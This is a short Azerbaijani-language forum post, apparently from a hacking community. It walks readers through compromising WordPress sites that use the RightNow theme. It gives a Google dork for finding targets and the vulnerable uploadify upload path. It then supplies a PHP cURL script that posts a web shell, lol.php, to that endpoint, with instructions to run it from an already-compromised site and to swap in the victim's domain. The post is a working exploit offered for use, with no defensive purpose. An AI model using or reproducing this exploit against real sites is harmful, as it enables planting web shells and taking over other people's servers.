Deməli Dork : inurl:wp-content/themes/RightNow/
Vuln Check URL : wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php ( Vuln olan hissə buradır )
Shell folder : wp-content/uploads/settingsimages/lol.php ( Shelin upload olacağı folder budur )
Exploit kodu aşağıdadır :
Kod:
<?php
$uploadfile="lol.php";
$ch=curl_init("http://testsite.com/site/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Deməli shelliniz olan bir saytda test.php-nizi yaradırsınız yuxarıda göstərdiyim exploit kodu həmin test php içinə yazırsınız sonra hədəf saytı kodun içindəki testsite.com saytı olan yerə yazırsınız və öz test.php-nizi çalişdirirsiniz Succesfull Olsa deməli shell upload oldu . Shell folder : wp-content/uploads/settingsimages/lol.php ( Shelin upload olacağı folder budur )
Video çəkməyə vaxt olmadı lazım olsa onuda həll edərik sualınız olsa buyurun